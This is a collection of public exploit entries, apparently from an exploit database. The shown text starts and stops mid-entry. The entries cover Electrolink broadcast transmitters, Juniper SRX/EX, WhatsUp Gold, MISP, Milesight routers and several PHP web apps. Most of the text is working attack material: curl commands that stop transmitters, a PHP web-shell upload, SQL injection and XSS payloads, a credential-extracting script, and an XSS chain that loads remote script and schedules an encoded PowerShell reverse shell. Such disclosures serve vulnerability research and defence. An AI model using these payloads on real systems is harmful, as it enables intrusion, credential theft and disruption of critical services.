} print('Removing security control...') r = requests.post(url, data = postd, headers = signature) if r.status_code == 200: print('Done. Go and "Login".') else: print('Error') exit(-4)

Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The transmitter is suffering from a Denial of Service (DoS) scenario. An unauthenticated attacker can reset the board as well as stop the transmitter operations by sending one GET request to the command.cgi gateway. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5795 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php 30.06.2023 -- C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board) Success! OK C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop) Success! OK C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start) Success! OK

Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device allows access to an unprotected endpoint that allows MPFS File System binary image upload without authentication. The MPFS2 file system module provides a light-weight read-only file system that can be stored in external EEPROM, external serial Flash, or internal Flash program memory. This file system serves as the basis for the HTTP2 web server module, but is also used by the SNMP module and is available to other applications that require basic read-only storage capabilities. This can be exploited to overwrite the flash program memory that holds the web server's main interfaces and execute arbitrary code. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5796 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html 30.06.2023 -- POST /upload HTTP/1.1 Host: 192.168.150.77:8888 Content-Length: 251 Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----joxypoxy User-Agent: MPFS2_PoC/1.0c Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Login=IgnoreMePlsKtnx Connection: close ------joxypoxy Content-Disposition: form-data; name="i"; filename="MPFSimg.bin" Content-Type: application/octet-stream MPFS...<CGI BINARY PHONE HOME> -----joxypoxy-- HTTP/1.1 200 OK Connection: close Content-Type: text/html <html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html> --- hd htm: 0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C.... 2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d.... 00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm.<ht 6d 6c 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 53 4c 3c ml>..<title>ZSL< ... ... 64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..- --- MPFS Structure: [M][P][F][S] [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files] [Name Hash 0][Name Hash 1]...[Name Hash N] [File Record 0][File Record 1]...[File Record N] [String 0][String 1]...[String N] [File Data 0][File Data 1]...[File Data N] --- C:\>javaw -jar MPFS2.jar C:\>mpfs2 -v -l MPFSimg.bin Version: 2.1 Number of files: 1 (1 regular, 0 index) Number of dynamic variables: 0 FileRecord 0: .StringPtr = 32 index0.htm .DataPtr = 43 .Len = 48 .Timestamp = 2023-08-27T14:39:30Z .Flags = 0

# *************************************************************************************************** # Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC) # Description: # # This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845. # It executes the phpinfo() function on the login page of the target device, # allowing to inspect the PHP configuration. also this script has the option to save the phpinfo() # output to a file for further analysis. # # Shodan Dork: http.favicon.hash:2141724739 # Date: 2023/10/01 # Exploit Author: whiteOwl ([email protected]) # Vendor Homepage: https://whiteowl-pub.github.io # Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5, # 21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22. # 4R2-S1/R3,23.2R1-S1/R2 # Tested on: JUNOS SM804122pri 15.1X49-D170.4 # CVE : cve-2023-36845 # *************************************************************************************************** import argparse import requests banner = """ ************************************************************* * CVE-2023-36845 Vulnerability Detector & Proof of concept * * This script checks for the CVE-2023-36845 vulnerability * * and run phpinfo() on vulnerable devices. * * If you suspect a vulnerable system, please take action * * immediately to secure it. * * * * Author: whiteowl * ************************************************************* """ def send_request(url, output_file=None, verbose=False): target_url = f"{url}/?PHPRC=/dev/fd/0" data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="' headers = { 'User-Agent': 'Mozilla/5.0', } try: response = requests.post(target_url, headers=headers, data=data, stream=True) if response.status_code == 200: print("The Target Device is Vulnerable to: CVE-2023-36845") else: print("Not Vulnerable: Status Code", response.status_code) if output_file: with open(output_file, 'w', encoding='utf-8') as file: file.write(response.text) if verbose: print(f"HTTP Status Code: {response.status_code}") print("Response Headers:") for header, value in response.headers.items(): print(f"{header}: {value}") print("Response Content:") print(response.text) except requests.exceptions.RequestException as e: print(f"An error occurred: {e}") def main(): print(banner) parser = argparse.ArgumentParser(description="Custom curl-like script") parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request") parser.add_argument("-o", "--output", help="Output file to save the HTML content") parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode") args = parser.parse_args() send_request(args.url, args.output, args.verbose) if __name__ == "__main__": main()

# Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored) # Date: 29/09/2023 # Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip # Version: 1.0 # Last Update: 31 August 2022 # Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30 # 1: Create user, login and go to profile.php # 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field. # 3: When entering the profile.php page, document.cookie will be reflected every time. # Author This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner. # About Rapplex Rapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites. Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments. So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. "Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson. # HTTP Request POST /gym/profile.php HTTP/1.1 Host: localhost Content-Length: 129 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE Connection: close fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update

# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE # Date: 07.10.2023 # Exploit Author: Oğulcan Hami Gül # Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code # Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code # Version: 1.0 # Tested on: Windows 10 ## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication. POST /pms/users.php HTTP/1.1 Host: 192.168.1.36 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367 Content-Length: 1054 Origin: http://192.168.1.36 Connection: close Referer: http://192.168.1.36/pms/users.php Upgrade-Insecure-Requests: 1 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="display_name" sefa7 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="user_name" sefa7 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="password" sefa7 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php" Content-Type: application/x-php <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd <!-- http://michaeldaw.org 2006 --> -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="save_user" -----------------------------421755697017784551042596452367-- ## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication. ## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.

# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL Injection # Date: 28/9/2023 # Exploit Author: Puja Dey # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Wamp 1) login into the application 2) click on report on pass and capture the request in burpsuite 3) Parameter "FromDate" is vulnerable to SQL Injection Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND 'SOzQ'='SOzQ&todate=&submit= 4) Put '*' in the value for the parameter and save the item as cpme 5) Run sqlmap -r cpme --batch --dbs --random-agent

# Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated) # Date: 8th October 2023 # Exploit Author: Mücahit Çeri # Vendor Homepage: https://www.circl.lu/ # Software Link: https://github.com/MISP/MISP # Version: 2.4.171 # Tested on: Ubuntu 20.04 # CVE : CVE-2023-37307 # Exploit: Logged in as low privileged account 1)Click on the "Galaxies" button in the top menu 2)Click "Add Cluster" in the left menu. 3)Enter the payload "</title><script>alert(1)</script>" in the Name parameter. 4)Other fields are filled randomly. Click on Submit button. 5)When the relevant cluster is displayed, we see that alert(1) is running

# Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS) # Date: April 18, 2023 # Exploit Author: Andreas Finstad (4ndr34z) # Vendor Homepage: https://www.whatsupgold.com # Version: v.22.1.0 Build 39 # Tested on: Windows 2022 Server # CVE : CVE-2023-35759 # Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759 WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter. Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39) Product Name: WhatsUp Gold 2022 Version: 22.1.0 Build 39 Vulnerability Type: Stored Cross-Site Scripting (XSS) Description: WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions. As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3) The XSS trigger when clicking the "All names and addresses" Stage: Base64 encoded id property: var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a); Staged payload placed in the SNMP sysName Field on a device: <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))> payload: var vhost = window.location.protocol+'\/\/'+window.location.host addaction(); async function addaction() { var arguments = '' let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{ method: 'POST', headers: { 'Connection': 'close', 'Content-Length': '1902', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'sec-ch-ua-mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'sec-ch-ua-platform': '"macOS"', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include', body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}' }); setTimeout(() => { getactions(); }, 1000); }; async function getactions() { const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{ method: 'GET', headers: { 'Connection': 'close', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'sec-ch-ua-mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'sec-ch-ua-platform': '"macOS"', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include' }); const actions = await response.json(); var results = []; var searchField = "Name"; var searchVal = "Systemtask"; for (var i=0 ; i < actions.length ; i++) { if (actions[i][searchField] == searchVal) { results.push(actions[i].Id); revshell(results[0]) } } //console.log(actions); }; async function revshell(ID) { fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{ method: 'POST', headers: { 'Connection': 'close', 'Content-Length': '2442', 'Cache-Control': 'max-age=0', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"macOS"', 'Upgrade-Insecure-Requests': '1', 'Origin': 'https://192.168.16.100', 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'iframe', 'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include', body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0' }); };

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption CVE: CVE-2023-43261 Script Author: Bipin Jitiya (@win3zz) Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.) Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable. Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10 Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf """ import sys import requests import re import warnings from Crypto.Cipher import AES # pip install pycryptodome from Crypto.Util.Padding import unpad import base64 import time warnings.filterwarnings("ignore") KEY = b'1111111111111111' IV = b'2222222222222222' def decrypt_password(password): try: return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8') except ValueError as e: display_output(' [-] Error occurred during password decryption: ' + str(e), 'red') def display_output(message, color): colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'} print(f"{colors[color]}{message}{colors['end']}") time.sleep(0.5) urls = [] if len(sys.argv) == 2: urls.append(sys.argv[1]) if len(sys.argv) == 3 and sys.argv[1] == '-f': with open(sys.argv[2], 'r') as file: urls.extend(file.read().splitlines()) if len(urls) == 0: display_output('Please provide a URL or a file with a list of URLs.', 'red') display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue') display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue') sys.exit() use_proxy = False proxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else None for url in urls: display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue') response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False) if response.status_code == 200: display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green') data = response.text credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data)) num_credentials = len(credentials) display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green') if num_credentials > 0: display_output('[+] Login page: ' + url + '/login.html', 'green') display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue') display_output('[+] Unique Credentials:', 'yellow') for i, (username, password) in enumerate(credentials, start=1): display_output(f' Credential {i}:', 'cyan') decrypted_password = decrypt_password(password.encode('utf-8')) display_output(f' - Username: {username}', 'green') display_output(f' - Password: {decrypted_password}', 'green') else: display_output('[-] No credentials found in the retrieved data for: ' + url, 'red') else: display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')

# Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 11.10.2023 # Exploit Author: Furkan ÖZER # Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/ # Version: 8.0.5 # Tested on: Kali-Linux,Windows10,Windows 11 # CVE: N/A # Description: Advanced Page Visit Counter is a remarkable Google Analytics alternative specifically designed for WordPress websites, and it has quickly become a must-have plugin for website owners and administrators seeking powerful tracking and analytical capabilities. With the recent addition of Enhanced eCommerce Tracking for WooCommerce, this plugin has become even more indispensable for online store owners. Homepage | Support | Premium Version If you’re in search of a GDPR-friendly website analytics plugin exclusively designed for WordPress, look no further than Advanced Page Visit Counter. This exceptional plugin offers a compelling alternative to Google Analytics and is definitely worth a try for those seeking enhanced data privacy compliance. This is a free plugin and 